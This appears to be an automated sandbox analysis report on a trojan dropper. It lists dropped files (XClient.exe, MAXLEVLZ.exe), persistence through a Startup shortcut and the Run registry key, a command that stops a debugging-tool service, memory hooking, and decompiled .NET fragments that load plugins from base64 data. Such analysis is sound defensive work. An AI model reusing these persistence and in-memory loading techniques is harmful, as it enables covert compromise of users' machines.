Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: XClient.lnk.4.dr

LNK file: ..\..\..\..\..\XClient.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Static file information: File size 31681536 > 1048576

Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1e35000

Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: XClient.exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: XClient.exe.0.dr, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: XClient.exe.0.dr, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: XClient.exe.0.dr, Messages.cs	.Net Code: Memory
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, Messages.cs	.Net Code: Memory

Source: initial sample

Static PE information: section where entry point is pointing to: .?OG

Source: MAXLEVLZ.exe.0.dr	Static PE information: section name: .Eqn
Source: MAXLEVLZ.exe.0.dr	Static PE information: section name: .#8>
Source: MAXLEVLZ.exe.0.dr	Static PE information: section name: .?OG

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Code function: 0_2_00007FF7BFEE00BD pushad ; iretd	0_2_00007FF7BFEE00C1
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Code function: 2_3_0000025B011C8AFF push es; ret	2_3_0000025B011C8B2E
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Code function: 2_3_0000025B011C90B3 push es; retf	2_3_0000025B011C9270
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Code function: 2_3_0000025B011C7930 push es; retf	2_3_0000025B011C7A48
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Code function: 2_3_0000025B011C76A1 push es; retf	2_3_0000025B011C7732
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Code function: 2_3_0000025B011C8C9B push es; retf	2_3_0000025B011C9270
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 4_2_00007FF7BFED00BD pushad ; iretd	4_2_00007FF7BFED00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF7BFDAD2A5 pushad ; iretd	5_2_00007FF7BFDAD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF7BFEC00BD pushad ; iretd	5_2_00007FF7BFEC00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF7BFF92316 push 8B485F94h; iretd	5_2_00007FF7BFF9231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF7BFDCD2A5 pushad ; iretd	21_2_00007FF7BFDCD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF7BFEE00BD pushad ; iretd	21_2_00007FF7BFEE00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF7BFEEC2C5 push ebx; iretd	21_2_00007FF7BFEEC2DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF7BFFB2316 push 8B485F92h; iretd	21_2_00007FF7BFFB231B
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 29_2_00007FF7BFEB00BD pushad ; iretd	29_2_00007FF7BFEB00C1
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 30_2_00007FF7BFEF00BD pushad ; iretd	30_2_00007FF7BFEF00C1

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	File created: C:\Users\user\AppData\Roaming\XClient.exe			Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	File created: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\XClient.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Source: C:\Users\user\AppData\Roaming\XClient.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Source: C:\Users\user\AppData\Roaming\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient			Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient			Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Memory written: PID: 7936 base: 7FF841A30008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Memory written: PID: 7936 base: 7FF8418CD9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Memory written: PID: 7936 base: 7FF841A4000D value: E9 BB CB EB FF	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Memory written: PID: 7936 base: 7FF8418FCBC0 value: E9 5A 34 14 00	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
